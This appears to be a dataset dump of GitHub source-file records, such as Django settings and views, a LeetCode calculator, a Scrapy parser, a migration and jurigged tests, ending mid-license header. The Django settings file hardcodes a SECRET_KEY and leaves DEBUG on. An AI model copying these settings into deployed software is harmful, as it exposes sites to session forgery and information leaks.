blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
43bfa04fb5ece9338f738dd4e6846bcad4faa6b6 | 317c4c6563f551450e530d4c4d1fa1061dba8834 | /config/settings.py | 448e9866150e5ed1daa360da7b39886eb59fbef9 | [] | no_license | qudcks0703/Coronamap | 1baa0b7134d61522a689adf4eab03f5ded518bca | 586e53c683d5132d252e51e6315d75589183e0b6 | refs/heads/master | 2021-03-25T19:54:49.348431 | 2020-04-22T16:00:10 | 2020-04-22T16:00:10 | 247,642,122 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,558 | py | """
Django settings for config project.
Generated by 'django-admin startproject' using Django 3.0.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '@ruupwt8cksg8gbagh^xzmsq%$_!4--vaq$v21awl$60=)k8gh'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.sites',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'corona',
# allauth
'allauth',
'allauth.account',
'allauth.socialaccount',
#provider
'allauth.socialaccount.providers.google'
]
SITE_ID=1
SOCIALACCOUNT_EMAIL_VERIFICATION = 'none'
LOGIN_REDIRECT_URL = "/allauth1/login1/"
#로그인 후 리다이렉트
ACCOUNT_LOGOUT_REDIRECT_URL = "/allauth1/login1/"
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join("corona/templates")],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATICFIELS_DIRS=[
#os.path.join(BASE_DIR,'corona','static')
]
STATIC_ROOT="" | [
"qudcks0703@naver.com"
] | qudcks0703@naver.com |
dd746b74e43acf7d47b6ac1e5af311e62ab6dd16 | ae12996324ff89489ded4c10163f7ff9919d080b | /LeetCodePython/BasicCalculator.py | c2378b22e407db140bf364ae250e27a2830a46bc | [] | no_license | DeanHe/Practice | 31f1f2522f3e7a35dc57f6c1ae74487ad044e2df | 3230cda09ad345f71bb1537cb66124ec051de3a5 | refs/heads/master | 2023-07-05T20:31:33.033409 | 2023-07-01T18:02:32 | 2023-07-01T18:02:32 | 149,399,927 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,610 | py | """
Given a string s representing a valid expression, implement a basic calculator to evaluate it, and return the result of the evaluation.
Note: You are not allowed to use any built-in function which evaluates strings as mathematical expressions, such as eval().
Example 1:
Input: s = "1 + 1"
Output: 2
Example 2:
Input: s = " 2-1 + 2 "
Output: 3
Example 3:
Input: s = "(1+(4+5+2)-3)+(6+8)"
Output: 23
Constraints:
1 <= s.length <= 3 * 105
s consists of digits, '+', '-', '(', ')', and ' '.
s represents a valid expression.
'+' is not used as a unary operation (i.e., "+1" and "+(2 + 3)" is invalid).
'-' could be used as a unary operation (i.e., "-1" and "-(2 + 3)" is valid).
There will be no two consecutive operators in the input.
Every number and running calculation will fit in a signed 32-bit integer.
"""
class BasicCalculator:
def calculate(self, s: str) -> int:
res, cur, sign, stack = 0, 0, 1, []
for c in s:
if c.isdigit():
cur = cur * 10 + int(c)
elif c == '+':
res += sign * cur
cur = 0
sign = 1
elif c == '-':
res += sign * cur
cur = 0
sign = -1
elif c == '(':
stack.append(res)
stack.append(sign)
sign = 1
res = 0
elif c == ')':
res += sign * cur
cur = 0
res *= stack.pop()
res += stack.pop()
if cur != 0:
res += sign * cur
return res | [
"tengda.he@gmail.com"
] | tengda.he@gmail.com |
68e5b4ce8d27c031b4815be6d870268a38d0e844 | 77d2276457369e0c6d7e3c52569a7c4bc52dcae7 | /settingsWidget.py | 37779cc5521f8d906acb00cb5a65a63c7a47269a | [] | no_license | lm30/repairconsole | c537dd3edf15af96fbdef14807dd0cebe70c67a0 | d30488900c8ea5f575769a82f0498057d2a5aa21 | refs/heads/main | 2023-02-10T08:07:10.126932 | 2021-01-08T16:09:46 | 2021-01-08T16:09:46 | 313,378,637 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,382 | py | from tkinter import *
import tkinter as tk
from overdueTable import OverdueTable
class SettingsWidget(object):
def __init__(self, root=None, **kwargs):
self.root = root
self.settings = {}
self.settingsFile = kwargs.pop("settingFile")
self.readFromFile()
# self.createSettingsFrame()
def readFromFile(self):
with open(self.settingsFile, "r") as settingFile:
for line in settingFile:
lineList = line.split()
if lineList[-1] == "True" or lineList[-1] == "true":
self.settings[lineList[0]] = True
elif lineList[-1] == "False" or lineList[-1] == "false":
self.settings[lineList[0]] = False
else:
self.settings[lineList[0]] = lineList[-1]
print(self.settings)
def setRepairTable(self, table):
self.repairTable = table
# change colors
self.repairTable.setOverdueColor(self.settings["overdue_color"])
self.repairTable.setFinishedColor(self.settings["finished_color"])
self.repairTable.refreshRepairs()
# change email settings
self.repairTable.setSendFinishedEmails(self.settings["auto_emails_finish"])
def setOverdue(self):
OverdueTable.overdue = int(self.settings["overdue_days"])
# def getFrame(self):
# return self.settingsFrame
def writeToFile(self):
pass
# def createSettingsFrame(self):
# self.settingsFrame = Frame(self.root)
# self.settingsFrame.pack(side=TOP, fill="both", expand=True)
| [
"lm3081@columbia.edu"
] | lm3081@columbia.edu |
2ab9c5759e332a8b4f1f8690e8e843b4b2547ec2 | 675fee420fd6d95022158ab15ae99451bf1ed94e | /exercises_p2/ex_1.py | 0e673143f405e1a227c913ed19875b9e2a2610f1 | [] | no_license | ogabriel/python_CS | 4e9b305896b6b0ca4bc68eb0b3e32ee73c032fa8 | ca59abe5dfdff3b935a5e3a06dae32517543cefb | refs/heads/master | 2020-07-31T20:37:47.870742 | 2019-11-14T04:13:06 | 2019-11-14T04:13:06 | 210,746,446 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 365 | py | # 1. Crie uma classe livro em python que possua os atributos nome, autor, sinopse e editora, seus dados precisam ser privados e populados no método construtor.
class Book:
def __init__(self, name, author, sinopsis, publisher):
self.__name = name
self.__author = author
self.__sinopsis = sinopsis
self.__publisher = publisher
| [
"gabrieloliver8991@gmail.com"
] | gabrieloliver8991@gmail.com |
5ec1afa9ae4cf5f61aea9e5fe0789a36c651733c | 09b988e143a20470a2383568371a7f6d11db0590 | /WriteBoundary.py | b2da7a386bc16a33f17adb2678996cb9ef8b3e29 | [] | no_license | mflattery/CharUtils | 17949c11252e587db29128cbf662f8950922b9fc | e32a7f7d2981dd33a3139c665f0773d94cc09b05 | refs/heads/master | 2020-08-19T03:01:45.228036 | 2019-10-17T19:26:54 | 2019-10-17T19:26:54 | 215,869,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,849 | py | #!/usr/bin/python
def WriteBoundary(currentshape, charbcfile= 'CHAR/Boundary/Working.sideset.1.bc',conefile='CHAR/Boundary/aero.bc' ):
coords=[]
coords.append('variables = film_coeff h_rec P degree_of_turbulence')
times=currentshape.t.unique()
DFi=currentshape[currentshape['t']==times[0]].sort_values(by='x')
xs=DFi.x.tolist()
ys=DFi.y.tolist()
coords.append(str(len(xs)))
for i, j in zip(xs,ys):
linei='{0:.8f} {1:.8f} {2:.1f}'.format(i,j,0)
coords.append(linei)
print('Writing AeroBC File')
coords.append(str(len(times)))
for t in times:
coords.append(str(t))
DFi=currentshape[currentshape['t']==t].sort_values(by='x')
for i in DFi.index:
linei='{0:.8f} {1:.3f} {2:.4f} {3:.1f} '.format(DFi.loc[i].film_coeff,DFi.loc[i].h_rec,DFi.loc[i].P,DFi.loc[i].degree_of_turbulence)
coords.append(linei)
print('writing Boundary condition file: {} '.format(charbcfile))
with open(charbcfile,'w') as f:
f.writelines("%s\n" % line for line in coords)
f.close()
# conebc=[]
# conebc.append('variables = time film_coeff h_rec P degree_of_turbulence ')
## BC=currentshape.loc[57]
# time1 = currentshape.x.iloc[(currentshape.x-0.20).abs().argsort()[:1]]
# BC=currentshape.loc[time1.index]
#
# for t in times:
# BCi=BC[BC.t==t]
# linei='{0:.5f} {1:.8f} {2:.3f} {3:.4f} {4:.1f} '.format(t,BCi.film_coeff.item(),BCi.h_rec.item(),BCi.P.item(),BCi.degree_of_turbulence.item())
# conebc.append(linei)
#
## print('writing Boundary condition file 1D Cone: {}'.format(char1Dconebcfile))
# with open(conefile,'w') as f:
# f.writelines("%s\n" % line for line in conebc)
# f.close() | [
"noreply@github.com"
] | noreply@github.com |
b8c181b7036db86385ac19a47e29672fc5271787 | 5fb9a3bad36829007c55e026c57a622f929c9862 | /MyFirstSite/webexample/views.py | c603c42b36a15c813f0242b3e10e897bcfed5bda | [] | no_license | max-krai/FirstSite | 3ad35455692a9a8b6faa0c2b098af40a2e29eb72 | dccd77c1f94b92c4b67e2985655839c4a7700e53 | refs/heads/main | 2023-07-28T11:28:32.912703 | 2021-09-11T08:08:10 | 2021-09-11T08:08:10 | 400,777,162 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 769 | py | from django.shortcuts import render, redirect
from .models import Task
from .forms import TaskForm
def index(request):
tasks = Task.objects.all()
return render(request,'webexample/index.html', {'title': 'Главная страница сайта', 'tasks': tasks})
def about(request):
return render(request,'webexample/about.html')
def create(request):
error = ''
if request.method == 'POST':
form = TaskForm(request.POST)
if form.is_valid():
form.save()
return redirect('home')
else:
error = 'Форма была неверной'
form = TaskForm()
context = {
'form': form,
'error': error
}
return render(request,'webexample/create.html', context) | [
"max-krai2014@yandex.ru"
] | max-krai2014@yandex.ru |
64545c0ee250c3ac77e43944cc077ea100d12e62 | 4411221e8ff141f2aba6e5f446126249c613fc5c | /tcdm/TCDM1_2/tcdm1_2.py | 81aa9f1b23a652308b40e8cd82945633b183911f | [] | no_license | jimlyall-q/test-gen | 15e6319e9646719768cae7cc5175eda274833001 | 7da7b986dd0049fc7d05cb869b45ca408e3bf05b | refs/heads/main | 2023-05-26T23:55:14.624502 | 2021-06-17T08:58:46 | 2021-06-17T08:58:46 | 377,731,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,854 | py |
from asyncio import sleep
from app.test_engine.logger import test_engine_logger as logger
from app.test_engine.models import TestCase, TestStep
from app.user_prompt_support.prompt_request import PromptRequest
from app.user_prompt_support.user_prompt_manager import (
PromptExchange,
user_prompt_manager,
)
class TCDM1_2(TestCase):
def create_test_steps(self) -> None:
self.test_steps = [
TestStep("Test Step 11.2.3.2-0: Reboot the DUT"),
TestStep("Test Step 11.2.3.2-1: Shut down the DUT"),
TestStep("Test Step 11.2.3.2-1: Send events/messages to DUT from TH"),
TestStep("Test Step 11.2.3.2-2: Factory Reset the DUT"),
]
async def setup(self) -> None:
logger.info("No setup")
async def execute(self) -> None:
# 11.2.3.2-0: Reboot the DUT
# Verify that the DUT sends the StartUp event before other events to TH
logger.info("11.2.3.2-0: Reboot the DUT")
self.next_step()
# 11.2.3.2-1: Shut down the DUT
# Verify that the DUT sends the ShutDown event to TH before shutting down
# No other event from the DUT should be sent to TH
#
logger.info("11.2.3.2-1: Shut down the DUT")
self.next_step()
# 11.2.3.2-1: Send events/messages to DUT from TH
# Verify that the messages sent to the DUT are dropped
logger.info("11.2.3.2-1: Send events/messages to DUT from TH")
self.next_step()
# 11.2.3.2-2: Factory Reset the DUT
# Verify that the DUT sends the Leave event to TH
# No more events from DUT should be sent
# Verify incoming messages to DUT are dropped
#
logger.info("11.2.3.2-2: Factory Reset the DUT")
self.next_step()
async def cleanup(self) -> None:
logger.info("No cleanup")
| [
"jim.lyall@qorvo.com"
] | jim.lyall@qorvo.com |
158b82911d79e6df1f08c7004ba7d66956b546a2 | 122b69168f02ea27d6e3fae8a3cbd374c505467e | /djangoAelz/aelz/aelz/views.py | 008d38a970d7c11494510a13ba5af09579b6baaf | [] | no_license | elizarius/backendSamples | 2f05352214bbbbee5c0fba2ab04e7c8025d44182 | 04392612924ac54755e87c450102cc4698e87b8e | refs/heads/master | 2023-08-05T19:34:50.774223 | 2023-07-27T08:44:41 | 2023-07-27T08:50:35 | 136,711,545 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 107 | py | from django.http import HttpResponse
def index(request):
return HttpResponse('Hello ***AELZ*** world') | [
"alexander.elizarov@ericsson.com"
] | alexander.elizarov@ericsson.com |
108f8469a44320ab72aeef7321914bf7aacec776 | 0d415744dd0987949184e6da98a8c5023d104ef3 | /parse/A5ChuangYeParse.py | 6701ba2b7007d1556af1ca86ad53345887a674ce | [] | no_license | MaGuiSen/url_catch | ba4aabac8329a5d7b8d653c8423c73c26ddb0a21 | 125521030a4af5cc1226b2b38ca426fc28db8be5 | refs/heads/master | 2021-05-03T06:44:01.282452 | 2018-02-09T10:00:16 | 2018-02-09T10:00:16 | 120,601,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,889 | py | # -*- coding: utf-8 -*-
from scrapy import Selector
from util import DateUtil
# A5创业网 详情解析
def parse(html):
response = Selector(text=html)
# 处理内容区
content_html = response.xpath(u'//div[@class="content"]')
if not content_html:
return None
# 去除内部不需要的标签
content_items = content_html.xpath(u'*[not(name(.)="script") and not(name(.)="style") '
u' and not(@class="sherry_labels")'
u' and not(name(.)="iframe")]|text()')
if not content_items:
return None
date_srf = response.xpath(u'//div[@class="source"]/text()').extract()
date_srf = u''.join(date_srf).strip()
date_srf = date_srf.split(u'来源:')
post_date = u''
src_ref = u''
if len(date_srf):
post_date = date_srf[0]
post_date = post_date.strip()
if len(date_srf) > 1:
src_ref = date_srf[1]
if not src_ref:
src_ref = response.xpath(u'//div[@class="source"]/a[@class="source-from"]/text()').extract_first(u'')
# 处理标题
title = response.xpath(u'//div[@class="sherry_title"]/h1/text()').extract_first(u'')
style_in_list = []
style_need_replace = [
{u'old': u'#eaeaea', u'new': u'#ffffff'},
]
# 处理作者
post_user = u''
# 处理tags
tags = u''
# 组装新的内容标签
content_html = u"""<div class="content">
%s
</div>
""" % (u''.join(content_items.extract()),)
content_item = {
u'title': title,
u'content_html': content_html,
u'post_date': post_date,
u'style_in_list': style_in_list,
u'style_need_replace': style_need_replace,
}
return content_item
if __name__ == '__main__':
pass
| [
"1059876295@qq.com"
] | 1059876295@qq.com |
e43a859a330d69b5393baa2c5770ed5bbb2c5619 | 6b15f5cab9091792024f8756e2cf0bab554bcfe2 | /Tedwebsite/speakers/migrations/0003_auto_20201004_2200.py | 225063aa75660068629ad9684916dcf5325faf3f | [] | no_license | Jaikishan30/Website | df1f4e853af99099bc4de70dd61ee50c3df6bfe0 | bb3467dc4283de02592c80836b001308d77f2172 | refs/heads/master | 2023-08-29T07:23:02.276495 | 2021-10-25T18:32:47 | 2021-10-25T18:32:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,531 | py | # Generated by Django 2.2.6 on 2020-10-04 16:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('speakers', '0002_auto_20200908_1359'),
]
operations = [
migrations.RenameField(
model_name='speaker',
old_name='comment',
new_name='know_speaker_description',
),
migrations.RenameField(
model_name='speaker',
old_name='name',
new_name='nominator_name',
),
migrations.AddField(
model_name='speaker',
name='nominee_about',
field=models.TextField(default='N/A'),
preserve_default=False,
),
migrations.AddField(
model_name='speaker',
name='nominee_name',
field=models.CharField(default='N/A', max_length=200),
preserve_default=False,
),
migrations.AddField(
model_name='speaker',
name='social_links',
field=models.TextField(default='N/A'),
preserve_default=False,
),
migrations.AddField(
model_name='speaker',
name='spoken_publicly_links',
field=models.TextField(default='N/A'),
preserve_default=False,
),
migrations.AddField(
model_name='speaker',
name='talk_about',
field=models.TextField(default='N/A'),
preserve_default=False,
),
]
| [
"ireneholmes221999@gmail.com"
] | ireneholmes221999@gmail.com |
c4f8026e28db67ae6e7ad6f1d7d31c16fda41a3a | f1caec328a46a3b9cd5cf732f97b5cf358c06b07 | /tests/test_codetools.py | b56e3c358fc6c50c159546c355644c1673967758 | [
"MIT"
] | permissive | gc-ss/jurigged | 878a4a815e618f47b6c459cfa434962fd81754bb | 5de42f013ea07c31fdfba20fe923d86936e089ec | refs/heads/master | 2023-04-04T20:52:17.105961 | 2021-04-20T22:18:07 | 2021-04-20T22:18:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,957 | py | import math
import os
from types import SimpleNamespace as NS
import pytest
from jurigged.codetools import CodeFile, StaleException
from jurigged.utils import locate
from .common import TemporaryModule
from .snippets import apple
class CodeCollection:
def __init__(self, tmod, basename):
self.tmod = tmod
self.basename = basename
self.variants = {
name.split(".py")[0].split(":")[1]
for name in os.listdir(
os.path.join(os.path.dirname(__file__), "snippets")
)
if name.startswith(basename)
}
module = tmod.imp(f"{basename}:main")
main_cf = CodeFile(module.__file__, module.__name__)
main_cf.associate(module)
self.module = module
self.main = main_cf
self.read_codefiles()
def read_codefiles(self):
files = {
variant: self.module.__file__
if variant == "main"
else self.tmod.transfer(f"{self.basename}:{variant}")[1]
for variant in self.variants
}
self.files = NS(**files)
self.cf = NS(
**{
variant: CodeFile(file, self.module.__name__)
for variant, file in files.items()
}
)
def read(self, name="main"):
path = getattr(self.files, name)
with open(path) as f:
return f.read()
def write(self, name, contents):
path = getattr(self.files, name)
open(path, "w").write(contents)
@pytest.fixture
def tmod(scope="module"):
return TemporaryModule()
@pytest.fixture
def apple_code(scope="module"):
cf = CodeFile(apple.__file__, apple.__name__)
cf.associate(apple)
return cf
@pytest.fixture
def ballon(tmod):
return CodeCollection(tmod, "ballon")
@pytest.fixture
def chips(tmod):
return CodeCollection(tmod, "chips")
@pytest.fixture
def dandelion(tmod):
return CodeCollection(tmod, "dandelion")
@pytest.fixture
def elephant(tmod):
return CodeCollection(tmod, "elephant")
@pytest.fixture
def firmament(tmod):
return CodeCollection(tmod, "firmament")
@pytest.fixture
def glamour(tmod):
return CodeCollection(tmod, "glamour")
@pytest.fixture
def iguana(tmod):
return CodeCollection(tmod, "iguana")
def test_collect(apple_code):
cat = {
f"{k[0]}@{k[2]}" if isinstance(k, tuple) else k: set(v.objects)
for k, v in apple_code.code.catalogue().items()
if set(v.objects)
}
assert cat == {
"ModuleCode@1": {apple},
"FunctionCode@1": {apple.crunch},
"FunctionCode@6": {apple.breakfast},
"FunctionCode@23": {apple.Orchard.cortland},
"ClassCode@13": {apple.Orchard},
"FunctionCode@14": {apple.Orchard.mcintosh},
"FunctionCode@18": {apple.Orchard.honeycrisp.__func__},
"FunctionCode@29": {apple.juggle},
"FunctionCode@36": {apple.pomme},
"FunctionCode@45": {apple.arbre},
"FunctionCode@46": {apple.pommier},
"FunctionCode@52": {apple.pommier.__wrapped__},
"ClassCode@57": {apple.FakeApple},
"FunctionCode@58": {apple.FakeApple.color.fget},
"FunctionCode@62": {apple.FakeApple.color.fset},
"tests.snippets.apple": {apple},
"tests.snippets.apple.crunch": {apple.crunch},
"tests.snippets.apple.breakfast": {apple.breakfast},
"tests.snippets.apple.Orchard.cortland": {apple.Orchard.cortland},
"tests.snippets.apple.Orchard": {apple.Orchard},
"tests.snippets.apple.Orchard.mcintosh": {apple.Orchard.mcintosh},
"tests.snippets.apple.Orchard.honeycrisp": {
apple.Orchard.honeycrisp.__func__
},
"tests.snippets.apple.juggle": {apple.juggle},
"tests.snippets.apple.pomme": {apple.pomme},
"tests.snippets.apple.arbre": {apple.arbre},
"tests.snippets.apple.arbre.branche": {apple.pommier},
"tests.snippets.apple.pommier": {apple.pommier.__wrapped__},
"tests.snippets.apple.FakeApple": {apple.FakeApple},
"tests.snippets.apple.FakeApple.color": {apple.FakeApple.color.fset},
}
def test_merge(ballon):
radius = 10
cir = ballon.module.FlatCircle(radius)
inflate = ballon.module.inflate
volume = cir.volume
# Initial definitions
assert ballon.module.inflate(5) == 10
assert inflate(5) == 10
assert cir.volume() == -1
assert volume() == -1
assert cir.unsightly() == "yuck"
with pytest.raises(AttributeError):
cir.circumference()
assert ballon.module.uninteresting() is None
# Merge the new code
ballon.main.merge(ballon.cf.v2)
# New definitions should be active
assert ballon.module.inflate(5) == 15
assert inflate(5) == 15
assert ballon.module.deflate(15) == 5
assert cir.volume() == 0
assert volume() == 0
with pytest.raises(AttributeError):
cir.unsightly()
assert cir.circumference() == 2 * math.pi * radius
with pytest.raises(AttributeError):
ballon.module.uninteresting()
def test_merge_partial(ballon):
radius = 10
cir = ballon.module.FlatCircle(radius)
assert cir.volume() == -1
assert cir.unsightly() == "yuck"
ballon.main.merge(ballon.cf.v2, allow_deletions=False)
assert cir.volume() == 0
assert cir.unsightly() == "yuck"
def test_merge_back_and_forth(ballon):
radius = 10
cir = ballon.module.FlatCircle(radius)
inflate = ballon.module.inflate
volume = cir.volume
def _initial():
# Initial definitions
assert ballon.module.inflate(5) == 10
assert inflate(5) == 10
assert cir.volume() == -1
assert volume() == -1
assert cir.unsightly() == "yuck"
with pytest.raises(AttributeError):
cir.circumference()
assert ballon.module.uninteresting() is None
def _new():
# New definitions should be active
assert ballon.module.inflate(5) == 15
assert inflate(5) == 15
assert ballon.module.deflate(15) == 5
assert cir.volume() == 0
assert volume() == 0
with pytest.raises(AttributeError):
cir.unsightly()
assert cir.circumference() == 2 * math.pi * radius
with pytest.raises(AttributeError):
ballon.module.uninteresting()
_initial()
# We must re-read the codefiles each time because the definitions
# may be modified by merge.
ballon.read_codefiles()
ballon.main.merge(ballon.cf.v2)
_new()
ballon.read_codefiles()
ballon.main.merge(ballon.cf.main)
_initial()
ballon.read_codefiles()
ballon.main.merge(ballon.cf.v2)
_new()
ballon.read_codefiles()
ballon.main.merge(ballon.cf.main)
_initial()
ballon.read_codefiles()
ballon.main.merge(ballon.cf.v2)
_new()
def test_merge_decorators(chips):
assert chips.module.munch(4) == 6
chips.main.merge(chips.cf.mod, allow_deletions=False)
assert chips.module.munch(4, 2) == 8
def test_merge_decorators_change(chips):
assert chips.module.munch(4) == 6
chips.main.merge(chips.cf.bad, allow_deletions=False)
assert chips.module.munch(4) == 17
def test_change_decorator(chips):
assert chips.module.munch(4) == 6
chips.main.merge(chips.cf.newdeco, allow_deletions=False)
assert chips.module.munch(4) == 8
def test_change_decorator_multiple(chips):
assert chips.module.munch(4) == 6
chips.main.merge(chips.cf.newdeco, allow_deletions=False)
assert chips.module.munch(4) == 8
chips.main.merge(chips.cf.newdeco2, allow_deletions=False)
assert chips.module.munch(4) == 10
def test_change_decorator_then_fn(chips):
assert chips.module.munch(4) == 6
chips.main.merge(chips.cf.newdeco, allow_deletions=False)
chips.main.merge(chips.cf.newfn, allow_deletions=False)
assert chips.module.munch(4) == 404
def test_change_fn_then_decorator(chips):
assert chips.module.munch(4) == 6
chips.main.merge(chips.cf.newfn, allow_deletions=False)
chips.main.merge(chips.cf.newdeco, allow_deletions=False)
assert chips.module.munch(4) == 404
def test_commit_noop(dandelion):
orig = dandelion.read()
dandelion.main.commit()
assert dandelion.read() == orig
def test_commit(dandelion):
orig = dandelion.read()
dandelion.main.merge(dandelion.cf.v2)
assert dandelion.read() == orig
dandelion.main.commit()
print(dandelion.read().strip())
assert dandelion.read().strip() == dandelion.read("v2result").strip()
def test_commit_partial(dandelion):
orig = dandelion.read()
dandelion.main.merge(dandelion.cf.repl, allow_deletions=False)
assert dandelion.read() == orig
dandelion.main.commit()
assert dandelion.read() == dandelion.read("outcome")
def test_commit_partial_2(dandelion):
orig = dandelion.read()
dandelion.main.merge(
dandelion.cf.repl,
allow_deletions=[
locate(dandelion.module.plack, dandelion.main.code.catalogue())
],
)
assert dandelion.read() == orig
dandelion.main.commit()
assert dandelion.read() == dandelion.read("outcome2")
def test_commit_stale(dandelion):
dandelion.main.merge(dandelion.cf.v2)
open(dandelion.main.filename, "w").write("")
with pytest.raises(StaleException):
dandelion.main.commit()
def test_functions_interface(elephant):
do = elephant.module.do
assert do(7) == ["Paint 7 canvasses", "Sing 7 songs", "Dance for 7 hours"]
elephant.main.merge(elephant.cf.mod)
assert do(7) == ["Paint 7 canvasses", "Sing 14 songs", "Dance for 7 hours"]
def test_functions_interface_add(elephant):
do = elephant.module.do
assert do(7) == ["Paint 7 canvasses", "Sing 7 songs", "Dance for 7 hours"]
elephant.main.merge(elephant.cf.more)
assert do(7) == [
"Paint 7 canvasses",
"Sing 7 songs",
"Worship the 7 suns",
"Dance for 7 hours",
"Do 7 push-ups",
]
def test_functions_interface_rm(elephant):
do = elephant.module.do
assert do(7) == ["Paint 7 canvasses", "Sing 7 songs", "Dance for 7 hours"]
elephant.main.merge(elephant.cf.less)
assert do(7) == ["Eat 7 bananas"]
def test_update_statements(firmament):
assert firmament.module.sirius(5) == 25
firmament.module.ursa_major.append(888)
assert firmament.module.betelgeuse == 1000
firmament.main.merge(firmament.cf.mod)
assert firmament.module.sirius(5) == 3
# Does not re-run the ursa_major assignment because it did not change
assert firmament.module.ursa_major == [1, 2, 3, 4, 888]
# Re-runs betelgeuse assignment
assert firmament.module.betelgeuse == 41
def test_regen_statements(firmament):
firmament.main.merge(firmament.cf.mod)
firmament.main.commit()
assert firmament.read().strip() == firmament.read("result").strip()
def test_change_supermethod(glamour):
assert glamour.module.Scarf(5).swagger() == 10
glamour.main.merge(glamour.cf.mod, allow_deletions=False)
assert glamour.module.Scarf(5).swagger() == 15
def test_remove_super(glamour):
assert glamour.module.Scarf(5).swagger() == 10
glamour.main.merge(glamour.cf.mod2)
assert glamour.module.Scarf(5).swagger() == 1234
def test_add_class_statement(glamour):
assert glamour.module.Scarf(5).swagger() == 10
glamour.main.merge(glamour.cf.mod3)
assert glamour.module.Scarf(5).swagger() == 50
assert glamour.module.Scarf(5).also_swagger() == 50
assert glamour.module.Scarf(5).hello() == "hello!"
def test_bad_statement(iguana):
# This tests that one bad statement will not interfere with the rest of the
# changes.
assert iguana.module.lizard(3) == "sss"
iguana.main.merge(iguana.cf.bad)
assert iguana.module.lizard(3) == "ssssss"
def test_set_globals(ballon):
glb = {"a": 2}
ballon.main.code.set_globals(glb)
assert ballon.main.code.get_globals() is glb
| [
"breuleux@gmail.com"
] | breuleux@gmail.com |
8233376cc2e372ec234ab3f707c4847c1250f2c1 | 5b4eca59f344a1a21c7a44d4913611f663f983b1 | /superset/dashboards/api.py | bca033431067798192a3c5eeef22dd508d65c3a8 | [
"Apache-2.0",
"OFL-1.1"
] | permissive | guannie/synapse-superset-public | 3e78d382570c70d69fefa2ee2d4512bbad19bb29 | 5e64d65a8b8202b57b7a98275d4d50416211d49b | refs/heads/master | 2023-08-10T04:28:02.984446 | 2021-08-10T20:38:13 | 2021-08-10T20:38:13 | 203,940,387 | 0 | 0 | Apache-2.0 | 2022-12-19T09:07:00 | 2019-08-23T06:45:49 | Python | UTF-8 | Python | false | false | 33,091 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
